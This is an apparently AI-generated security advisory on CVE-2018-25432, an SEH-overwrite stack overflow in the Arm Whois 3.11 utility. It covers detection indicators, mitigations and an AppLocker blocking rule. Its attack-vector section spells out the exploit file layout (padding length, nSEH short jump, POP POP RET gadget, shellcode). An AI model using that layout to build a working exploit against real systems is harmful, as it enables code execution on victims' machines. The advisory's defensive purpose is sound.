CVE-2018-25432 Overview
CVE-2018-25432 is a stack-based buffer overflow vulnerability in Arm Whois 3.11, a Windows-based WHOIS lookup utility distributed by Armcode. The flaw allows local attackers to execute arbitrary code by supplying a crafted input file. The malicious input overwrites the Structured Exception Handler (SEH) chain on the stack, redirecting execution to attacker-controlled code. The vulnerability is tracked under [CWE-120] (Buffer Copy without Checking Size of Input) and is documented in Exploit-DB #45907 and the VulnCheck Arm Whois Advisory.
Critical Impact
Local attackers can execute arbitrary code in the context of the Arm Whois process by leveraging SEH overwrite techniques, bypassing Address Space Layout Randomization (ASLR).
Affected Products
- Armcode Arm Whois version 3.11
- Distributed via arm-whois.exe from the Armcode website
- Microsoft Windows platforms running the vulnerable binary
Discovery Timeline
- 2026-06-01 - CVE-2018-25432 published to NVD
- 2026-06-02 - Last updated in NVD database
Technical Details for CVE-2018-25432
Vulnerability Analysis
The vulnerability is a classic stack-based buffer overflow that targets the Windows SEH chain. Arm Whois 3.11 reads attacker-controlled data from an input file into a fixed-size stack buffer without performing proper bounds checking. When the supplied data exceeds the buffer capacity, adjacent stack memory is overwritten, including the saved next-SEH (nSEH) record and the SEH handler pointer.
When an exception is triggered after the overflow, the Windows exception dispatcher transfers control to the corrupted handler address. The attacker uses this transfer to redirect execution into attacker-supplied shellcode, typically via a POP POP RET gadget from a module without SafeSEH or ASLR. The published proof of concept achieves SEH overwrite at a 672-byte offset within the malicious input file.
Root Cause
The root cause is missing input length validation when Arm Whois processes file-based input. The application copies user-supplied content into a stack buffer using an unbounded copy routine, allowing data beyond the buffer boundary to clobber adjacent stack frames. The condition aligns with [CWE-120], where the lack of size verification permits an attacker to overwrite the nSEH and SEH pointer fields that the runtime relies on for structured exception handling.
Attack Vector
Exploitation requires local access and user interaction with a malicious input file. An attacker crafts a file containing 668 bytes of padding, followed by 4 bytes overwriting nSEH with a short jump, and 4 bytes overwriting the SEH handler pointer with the address of a POP POP RET gadget. The remaining bytes hold shellcode. When the victim opens the file in Arm Whois, the overflow triggers an exception, the corrupted SEH chain is invoked, and execution pivots into the attacker payload. The exploit chain referenced in Exploit-DB #45907 demonstrates ASLR bypass by sourcing the gadget from a non-randomized module.
Detection Methods for CVE-2018-25432
Indicators of Compromise
- Presence of arm-whois.exe version 3.11 on managed endpoints
- Crash dumps or Windows Error Reporting events referencing arm-whois.exe with access violations in exception handling
- Input files exceeding typical WHOIS query length, particularly with content around the 672-byte offset
- Unexpected child processes spawned by arm-whois.exe, such as cmd.exe or powershell.exe
Detection Strategies
- Inventory endpoints for the vulnerable binary using software asset management or EDR file telemetry
- Monitor process creation events where arm-whois.exe is the parent of shell or scripting interpreters
- Hunt for module load anomalies and exception-handler-driven control flow within the process
- Alert on file writes of suspiciously sized input files in directories accessed by Arm Whois
Monitoring Recommendations
- Enable command-line and process lineage logging via Sysmon Event IDs 1 and 11 on Windows hosts
- Correlate exception-handling crashes with subsequent process injection or network activity
- Track execution of arm-whois.exe across the environment and flag installs that bypass approved software channels
How to Mitigate CVE-2018-25432
Immediate Actions Required
- Remove or block execution of Arm Whois 3.11 (arm-whois.exe) on all managed endpoints
- Restrict opening of untrusted input files with the affected utility
- Apply application allow-listing to prevent unauthorized execution of the vulnerable binary
- Replace Arm Whois with a maintained WHOIS client that enforces input validation
Patch Information
No vendor patch is referenced in the available advisories. The Armcode company website hosts the affected arm-whois.exe download, but no fixed version has been published. Organizations should treat the product as unmaintained and remove it from production systems. Consult the VulnCheck Arm Whois Advisory for ongoing status.
Workarounds
- Uninstall Arm Whois 3.11 and use vendor-supported alternatives for WHOIS lookups
- Enforce Data Execution Prevention (DEP) and SafeSEH at the system level to raise exploitation cost
- Apply Windows Defender Exploit Guard or equivalent exploit mitigations to harden legacy binaries
- Run the utility only in isolated, non-privileged environments if its use cannot be eliminated
# Configuration example: block execution of arm-whois.exe via Windows AppLocker (PowerShell)
New-AppLockerPolicy -RuleType Path -User Everyone -Action Deny `
-Path "%PROGRAMFILES%\Armcode\arm-whois.exe" `
-RuleNamePrefix "Block-CVE-2018-25432" | `
Set-AppLockerPolicy -Merge
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
